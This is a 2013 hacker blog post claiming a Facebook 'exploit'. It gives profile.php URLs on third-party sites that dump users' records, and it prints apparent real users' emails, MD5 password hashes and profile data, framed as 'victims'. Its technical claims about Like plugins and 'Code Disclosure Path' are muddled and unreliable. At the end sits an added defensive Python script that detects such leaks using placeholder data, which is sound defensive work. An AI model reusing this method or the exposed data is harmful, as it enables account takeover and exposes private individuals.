Exploit Facebook Via External Plugins and Modules

Facebook 0day 2013 | Juno_okyo's Blog
#############################################################
# Title: Exploit Facebook Via External Plugins and Modules  
# Exploitation: Manually (use your brain ^_^)
# Date:  28/03/2013 
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################


For example, my victim is =======>>>  https://www.facebook.com/gaturro22
How could I retrieve his password? Easy.
Proof of Concept : Facebook Id ====>>> gaturro22
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So as you can see, we got the email & the password:
email: gonza.la22@gmail.com

password: e10adc3949ba59abbe56e057f20f883e

Another Demo : http://www.salondaddy.com/profile.php?ID=85


So when I try the same method with my profile, for example: http://www.poringapic.com/profile.php?id=mauritanie.forever

It says "Invalid profile link followed!" loool, because I didn't click on the Like Button. So, a piece of advice: be careful, don't like external pages on websites; they are backdoored with a javascript malware that can sniff all your information ^_^

So for example the ID "profile.php" is infected with "Code Disclosure Path". As you can see, most websites nowadays use Facebook plugins on their websites, especially applications, so the Facebook user must allow permission to access the application, and most of the plugins are infected !_!

So if you see that a website has the Like Plugin or uses a Facebook app, you can surely get the passwords of the users ^_^ no doubt, just use your brain!

Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top

Check this :  [NickName] => orso44  ===========>>> add this to www.facebook.com

http://www.facebook.com/orso44   ============>>> Facebook Profile

[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5


Another Victim :  ==========>>> https://www.facebook.com/kornberg

Infos Retrieved :

                    [_iProfileID] => 7893
                    [_aProfile] => Array
                        (
                            [datafile] => 1
                            [ID] => 7893
                            [NickName] => Kornberg
                            [Email] => anselmpennell435@yahoo.com
                            [Password] => 087fbfdeb33dae28260cfdb8f2d8a787
                            [Status] => Active
                            {
                            "id": "862420463",
                            "name": "Zoe Kornberg",
                            "first_name": "Zoe",
                            "last_name": "Kornberg",
                            "username": "kornberg",
                            "gender": "female",
                            "locale": "en_US"
                            }

Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand

I just selected this user randomly from Facebook and I noticed that she clicked on the Like Button and she has been a victim °_° !!!!!!!
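
A regression check for the kind of output quoted in this post, as an added example that is not part of the original text: it scans a rendered page body from your own site for `[Key] => value` or `key: value` fields that carry credentials or MD5-shaped values, and redacts them in the report. The field list, function names and sample body are assumptions constructed for illustration.

```python
import re

# Field names that should never be rendered into a public page (assumed list).
SENSITIVE_KEYS = {"password", "passwd", "pwd", "email", "salt"}
# print_r()-style "[Key] => value" pairs, the shape of the output quoted in the post.
PRINT_R_PAIR = re.compile(r"\[(\w+)\][ \t]*=>[ \t]*(\S+)")
# Plain "key: value" lines.
LABELLED_PAIR = re.compile(r"^[ \t]*(\w+)[ \t]*:[ \t]*(\S+)[ \t]*$", re.MULTILINE)
# 32 hex characters: the shape of an unsalted MD5 digest.
MD5_SHAPE = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed sample body; every value is a placeholder, not real data.
SAMPLE_BODY = """<html><body><pre>
[_iProfileID] => 1001
[NickName] => alice_example
[Email] => alice@example.test
[Password] => 00112233445566778899aabbccddeeff
[Status] => Active
</pre></body></html>"""


def redact(value):
    """Keep two characters for triage; never copy the secret into the report."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 4 else "****"


def find_leaks(body):
    """Return (key, reason, redacted_value) for each suspicious field in a page body."""
    findings, seen = [], set()
    for pattern in (PRINT_R_PAIR, LABELLED_PAIR):
        for key, value in pattern.findall(body):
            reasons = []
            if key.lower() in SENSITIVE_KEYS:
                reasons.append("sensitive field rendered")
            if MD5_SHAPE.match(value):
                reasons.append("MD5-shaped value")
            if reasons and (key, value) not in seen:
                seen.add((key, value))
                findings.append((key, ", ".join(reasons), redact(value)))
    return findings


if __name__ == "__main__":
    for key, reason, shown in find_leaks(SAMPLE_BODY):
        print(f"LEAK {key}: {reason} ({shown})")
```

Run it against rendered responses in a test suite and fail the build on any finding; a page that needs to show a user record should build its output from an explicit list of public fields rather than dumping the stored row.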

